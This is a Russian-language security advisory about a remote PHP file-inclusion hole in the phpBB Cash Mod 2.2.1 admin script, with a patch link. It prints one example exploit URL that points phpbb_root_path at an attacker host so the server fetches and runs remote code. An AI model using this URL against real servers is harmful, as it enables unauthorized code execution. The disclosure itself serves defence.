Security Lab

php инклудинг в phpBB

Дата публикации:19.11.2004
Дата изменения:20.10.2006
Всего просмотров:4596
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: phpBB Cash Mod 2.2.1

Описание:
Уязвимость обнаружена в модуле Cash Mod в phpBB. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.

Уязвимость обнаружена в файле '/admin/admin_cash.php'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример:

http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/

URL производителя: xore.ca/viewforum.php?f=2

Решение: Установите обновление: http://www.phpbb.com/phpBB/catdb.php?mode=download&id=539420

Ссылки: phpBB Cash Mod Include File Error Lets Remote Users Execute Arbitrary Code